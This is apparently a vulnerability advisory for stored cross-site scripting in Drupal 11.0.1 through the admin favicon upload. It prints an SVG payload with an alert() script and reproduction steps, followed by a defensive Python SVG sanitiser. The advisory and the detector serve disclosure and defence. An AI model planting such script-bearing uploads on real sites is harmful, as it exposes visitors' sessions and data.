Drupal 11.0.1: Malicious File Upload (XSS in SVG)
Description:
# An issue was discovered in Drupal 11.0.1
# We have identified a vulnerability that allows an authenticated admin account to upload an SVG file containing malicious JavaScript (stored Cross-Site Scripting) to the target system through the theme settings favicon upload. If the file is accessed through the website, the embedded script runs in the browser of whoever opens it (Cross-Site Scripting, XSS), or arbitrary code could be executed against the target via crafted JavaScript.
Affected Component:
http://[ip]/en/admin/appearance/settings
Payload:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('Grim The Ripper Team by SOSECURE Thailand');
</script>
</svg>
First, log in to the target web application using an admin account.
Next, open the “Appearance” panel and click the “Settings” tab.
After that, scroll down to the Favicon section and click “Choose File” to upload a malicious file.
Subsequently, select the “GrimtheRipperTeam.svg” file to upload to the web application.
Then click the “Save configuration” button to complete the upload.
Finally, we can see the path where the SVG file is stored, and we open it to check whether the malicious command in the file executes.
After accessing the path, we found that the malicious command works.
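As an added defensive example (not part of the original advisory and not Drupal code): a Python check of the kind an upload handler such as the favicon path above would run before accepting an SVG. It refuses DTDs, flags `<script>` and other active elements, event-handler attributes, executable `href`/`src` URIs, and processing instructions. The element and scheme lists, the function names and the constructed sample documents are this example's own assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Elements that execute script, embed HTML, or pull in other content.
# Lower-cased; the comparison is case-insensitive to stay conservative.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler", "use"}

# URI schemes that execute, or (data:) can carry a whole SVG/HTML document, in href/src.
DANGEROUS_URI = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)

# Any processing instruction other than the XML declaration, e.g. <?xml-stylesheet ...?>.
NON_DECL_PI = re.compile(rb"<\?(?!xml[\s?])")


def _local_name(qualified):
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def svg_active_content(svg_bytes):
    """Return a list of findings for an SVG upload; an empty list means no active content found."""
    findings = []

    # Refuse DTDs outright: entity declarations enable expansion and external-entity tricks.
    if b"<!DOCTYPE" in svg_bytes or b"<!ENTITY" in svg_bytes:
        return ["DOCTYPE or ENTITY declaration present"]
    if NON_DECL_PI.search(svg_bytes):
        findings.append("processing instruction present (e.g. xml-stylesheet)")

    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")

    for elem in root.iter():
        if not isinstance(elem.tag, str):  # comments/PIs, if a parser kept them
            continue
        name = _local_name(elem.tag)
        if name.lower() in ACTIVE_ELEMENTS:
            findings.append(f"active element <{name}>")
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            elif attr_name.lower() in ("href", "src") and DANGEROUS_URI.match(value):
                findings.append(f"{attr_name} with executable URI on <{name}>")
    return findings


def is_safe_svg(svg_bytes):
    """Convenience wrapper: True only when no finding was raised."""
    return not svg_active_content(svg_bytes)


# Constructed sample documents for demonstration (not files from the advisory).
SVG_NS = 'xmlns="http://www.w3.org/2000/svg"'
CLEAN_SVG = f'<svg {SVG_NS}><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>'.encode()
SCRIPT_SVG = (f'<svg {SVG_NS}><polygon points="0,0 0,50 50,0"/>'
              '<script type="text/javascript">/* constructed */</script></svg>').encode()
HANDLER_SVG = f'<svg {SVG_NS} onload="/* constructed */"><rect width="1" height="1"/></svg>'.encode()
HREF_SVG = (f'<svg {SVG_NS} xmlns:xlink="http://www.w3.org/1999/xlink">'
            '<a xlink:href="javascript:/* constructed */"><text>x</text></a></svg>').encode()
DTD_SVG = f'<!DOCTYPE svg [<!ENTITY e "x">]><svg {SVG_NS}/>'.encode()

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_SVG), ("script", SCRIPT_SVG), ("handler", HANDLER_SVG),
                       ("href", HREF_SVG), ("dtd", DTD_SVG)]:
        print(f"{label:8s} safe={is_safe_svg(doc)} findings={svg_active_content(doc)}")
```

The check is an allow-list on structure rather than a search for one payload string, so variations in how the script is written do not matter. It is one layer: serving user-supplied SVG with `Content-Disposition: attachment` or under a restrictive `Content-Security-Policy` keeps any file that slips through from running with the site's origin.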
Author:
Grim The Ripper Team by SOSECURE Thailand.